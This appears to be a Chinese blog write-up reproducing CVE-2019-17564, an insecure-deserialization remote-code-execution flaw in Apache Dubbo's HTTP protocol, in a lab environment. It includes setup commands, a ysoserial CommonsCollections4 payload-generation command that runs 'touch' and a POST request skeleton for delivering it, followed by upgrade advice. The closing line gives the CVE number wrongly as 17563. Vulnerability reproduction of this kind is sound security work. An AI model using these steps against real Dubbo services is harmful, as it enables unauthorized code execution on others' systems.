CVE-2019-17564漏洞复现[基于Ubuntu 16.04 LTS]

0x0 漏洞描述

Apache Dubbo支持多种协议，官方推荐使用 Dubbo 协议，CVE-2019-17564是属于Apache Dubbo HTTP协议中的一个反序列化漏洞，该漏洞的主要原因在于当Apache Dubbo启用HTTP协议之后，Apache Dubbo在接受来自消费者的远程调用请求的时候存在一个不安全的反序列化行为，最终导致了远程任意代码执行。

0x1 影响范围

2.7.0 <= Apache Dubbo <= 2.7.4
2.6.0 <= Apache Dubbo <= 2.6.7
Apache Dubbo = 2.5.x

0x2 漏洞复现

环境准备

本复现环境基于java8，因此请先配置好java环境。
由于dubbo启动依赖于zookeeper，所以首先我们需要下载并配置好然后再启动zookeeper。
为了搭建环境方便，我们直接下载使用github的dubbo-samples

git clone https://github.com/apache/dubbo-samples

另外，为了管理该项目，我们需要安装Maven

sudo apt-get install maven

安装完成后，可以使用如下命令检查

mvn -v

然后，我们需要修改dubbo-samples/java/dubbo-samples-http/目录下的pom.xml文件中的dubbo.version，将其改为存在漏洞的版本即可（如：本环境中的默认版本为2.7.5，更改为2.7.1），如图所示

修改之后我们就可以使用Maven进行项目管理并启动了，如下

mvn clean package
mvn -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java

如果执行完上述两条命令后看到dubbo service started提示，那么恭喜你，你离成功复现漏洞大概只剩一步之遥了。

环境搭建

为了能够实现RCE远程注入，我们还需要做一点准备工作。
首先，我们查看下java相关进程，找到我们刚刚启动的dubbo

我们注意下上图红框内的内容，然后将其复制下来。
我们需要做的是在刚刚复制的命令行中的plexus-classworlds-2.x.jar的后面加上commons-collections4-4.0.jar包的路径，即所谓的导入gadgets，然后再重新使用导入gadgets后的命令行来启动dubbo服务。

plexus-classworlds-2.x.jar:/home/su/cve-2019-17564/commons-collections4-4.0.jar 

我们重新输入命令如下

当我们再次看到dubbo service started提示时，我们就已经搭建好了漏洞复现所需要的环境了。

漏洞展示

首先，我们使用ysoserial生成payload

java -jar ysoserial.jar CommonsCollections4 "touch /home/su/cve-2019-17564/target/cve_2019_17564" >cve_2019_17564.ser

我们在burpsuit中发送如下请求，如下图

POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1
Host:yourip:8080

#这里需要导入用ysoserial生成的payload#

然后我们进去目标目录就能看到我们刚刚通过burp远程生成的文件

至此，我们成功复现了CVE-2019-17563漏洞，并利用该漏洞在我们想要的地方生成了任意文件

0x3 其他

修复建议

升级Apache Dubbo到2.7.5版本

关于此文

关于漏洞成因及修复方法可以参考下述链接，由于截止此篇文章完稿之时，网上该漏洞复现过程相关文章较少，此篇文章仅记录下该漏洞在ubuntu上的复现过程以作抛转引玉之用。
本人为刚进入网络安全领域不久的萌新一只，文中多有不足请大佬轻喷。另，若有转载需求请联系本人经本人允许后再做转载，谢谢！
To be continue…

参考链接

https://blog.csdn.net/caiqiiqi/article/details/104279860
https://mp.weixin.qq.com/s/reQaUVCa6RNG9tG_IZ_UjA
https://www.mail-archive.com/[email protected]/msg06225.html